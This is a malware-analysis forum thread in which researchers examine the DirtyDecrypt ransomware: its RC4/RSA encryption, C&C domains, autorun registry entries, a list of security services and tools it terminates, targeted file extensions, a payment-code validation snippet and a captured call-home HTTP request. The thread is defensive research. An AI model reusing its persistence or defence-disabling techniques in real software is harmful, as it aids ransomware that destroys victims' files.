[Cody Johnston]

Hello,

Picked this one up from a customer PC today. Has disturbing images on the front (blocked of course).



It encrypts all of the files and gives a message to run the "Dirty Decrypt.exe" (enclosed in the archive)



Dirty Decrypt.exe



VT: 3/47

https://www.virustotal.com/en/file/ac99 ... /analysis/

MD5: 4bb6c6c3f1ad7c2fb6096f6156c1df9b

Dropper, Dirty Decrypt.exe, and Sample encrypted pdf file enclosed. I do not have the original pdf file unfortunately. Happy 4th of July! :mrgreen:

[thisisu]

Autorun entries created and some code found in index.html

Code: Select all

	function Validation(paycode, system)
    {
		if(system == "psk")	{
					
			if(paycode.length != 16 || paycode.match("/^\d+$/")) return false;
			
			if (paycode.charAt(0) != "0") return false;

			for(var j = 0; j <= 9;j++)
				if (paycode.indexOf(RepeatSymbol(5, j)) != -1)  return false;
				
			if(paycode.match("1234567")) return false;
				
			return true;
			
		} else if (system == "moneypak") {
		
			if(paycode.length < 14 || paycode.length > 25 ||  paycode.match("/^\d+$/")) return false;
			
			for(var j = 0; j <= 9;j++)
				if (paycode.indexOf(RepeatSymbol(5, j)) != -1)  return false;

			if(paycode.match("1234567")) return false;
			
			return true;
		}
		
		return false;
	}	

[Fabian Wosar]

You can find the unpacked sample attached. C&C server appears to be pdstriker.com. The communication protocol appears to be protected using RSA. The public keys used for the communication can be found inside the resources, together with the C&C server as well as a whole bunch of different files containing the ransom note in various formats that the malware overwrites encrypted files with.

Files seem to be encrypted with RSA as well, which means decryption without the private key is not feasible. Don't quote me on that just yet though. I am kind of tired and only had a few minutes to look at the file. Will take a closer look tomorrow.

[EP_X0FF]

Used CryptoAPI, WOW64 compatible (can handle FS redirection), seems client-server rsa key decryption scheme.
Aware of certain applications process names and attempt to terminate them in usual way.
Autoruns through usual entries: Software\Microsoft\Windows\CurrentVersion\Run, Software\Microsoft\Windows NT\CurrentVersion\Winlogon (UserInit value) and autorun Start menu folder

Code: Select all

.data:0041B434                                         ; "wscsvc"
.data:0041B438                 dd offset aWindefend    ; "WinDefend"
.data:0041B43C                 dd offset aWuauserv     ; "wuauserv"
.data:0041B440                 dd offset aMpssvc       ; "MpsSvc"
.data:0041B448                                         ; "taskmgr"
.data:0041B44C                 dd offset aFilemon      ; "filemon"
.data:0041B450                 dd offset aTcpview      ; "tcpview"
.data:0041B454                 dd offset aFilemon_0    ; "filemon"
.data:0041B458                 dd offset aProcexp      ; "procexp"
.data:0041B45C                 dd offset aProcmon      ; "procmon"
.data:0041B460                 dd offset aRegmon       ; "regmon"
.data:0041B464                 dd offset aWireshark    ; "wireshark"
.data:0041B468                 dd offset aLordpe       ; "LordPE"
.data:0041B46C                 dd offset aRegedit      ; "regedit"

Targets following file extensions:

Code: Select all

.jpg
.jpeg
.png
.doc
.rtf
.zip
.7z
.pdf
.docx
.docm
.xls
.xlsx
.xlsm
.rar
.avi
.mpeg
.mpg
.wmv

Example of "call home":

Code: Select all

POST / HTTP/1.1
Host: viweabkkfe.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE)
Content-Type: multipart/form-data; boundary=AIXvIEELixblffGFsogn
Content-Length: 261
Accept-Language: en-us
Accept: text/html, application/xml;q=0.9, application/xhtml+xml;q=0.9, image/png, image/jpeg, image/gif, image/x-xbitmap, *\*;q=0.1
Accept-Charset: utf-8, utf-16;q=0.6, *;q=0.1
Pragma: no-cache
Connection: close

--removed
Content-Disposition: form-data; name="cmd"

ld
--removed
Content-Disposition: form-data; name="botid"

removed
--removed
Content-Disposition: form-data; name="lid"

0
--removed--
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 24 Jul 2013 GMT
Content-Type: application/octet-stream
Content-Length: 191
Connection: close
X-Powered-By: PHP/5.3.25
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 24 Jul 2013 GMT
Cache-Control: max-age=0
Pragma: no-cache

f~Б*;F
ж–КУњЂвѕjjЙ(tТ=Ґ»*А¤‹3Emпq‚tKЙ^CЯcїє”ФґФQ:jћ-‚ќоNА^ѓ\щЋ™u¦љєboиoЯџСМЦ•wз:`”џVПiЫ№Р%Є‚є?©‘я¤€•ҐХ9Ы 0©RчЫ:“”•Њ
T’6­У\h¬ЛЎ1i%нѕ3Ц1ЯП'#W4gn0vxвЈСЃ	FґтшГxL;ъ“ЧH‚

In attach:
1) original dropper
2) decrypted dropper (note additional tiny trojan downloader in the overlay)
3) extracted additional resources including ransomware pictures and second trojan - notificator

Always use backups.

VT
original
https://www.virustotal.com/en/file/e908 ... /analysis/

deobfuscated
https://www.virustotal.com/en/file/9c67 ... /analysis/

[Fabian Wosar]

An earlier variant of this particular malware was already uploaded here:
http://www.kernelmode.info/forum/viewto ... =16&t=2822

Nothing else to add really, as your observations are pretty much identical with what I saw back then.

[EP_X0FF]

Thanks, threads merged.

[Blaze]

New(er) variant on this one? Locks all files (PDF, DOC, JPG, ...) as usual and displays a message when trying to open the file.


Found some info on Malekal's forum: http://forum.malekal.com/decrypter-fich ... ml#p348572

The encrypting algorithm in the program is quite tricky it stores key used for files encryption in encrypted way. And the key can be decrypted back only at the server side in case if user has already paid.
Encryption algorithm RC4 + RSA1024 can't be cracked.

DirtyDecrypt.exe itself was not present on the system anymore(?). Also, registry files were dropped to C:\Programdata but these were already deleted by the user as well. These probably contain encryption algorithms for different filetypes.

Attached is a sample, Microsoft detects as: Trojan:Win32/Dircrypt.A. Unsure how the malware entered, very likely through EK which loaded Java exploit. I will attached the spl0its found on that system in the correct topic: http://kernelmode.info/forum/viewtopic.php?f=16&t=1819

According to Kaspersky (quote above) it's encrypted with RC4 + RSA1024 so I don't have my hopes up high to help the user in this case. System restore does not solve the issue. Tried some ransomware decryptors, but since they're for specific malware families, they were not able to solve the issue either. I'm now trying to recover the files with PhotoRec.

Any help and/or insight on this issue is appreciated. Dropper attached. MD5: 7a3c8d7f8b2b5bd26995dd33f4c1ee3c

[Artilllerie]

Hello,

Maybe some usefull tips :

1- DirtyDecrypt.exe is packed with UPX.

2- Confirm to use RSA :


3- Use a specific user-agent :


4- Bot ID reference here (and others parts) :


5- Just type 14 char for Moneypack test :


Show "Connection error" but no packet sniffed on my side.

All for the quick first look.

[Blaze]

Thanks Artilllerie for this quick glance! Have you been able to study this one further?

[Artilllerie]

Sorry for the late answer Blaze !

Nothing new about It for me but I think there is not very much to study I'm agree with Kasper the key is generated and stored on server side and without it we cannot decrypt datas.

If I find something new I will keep you posted !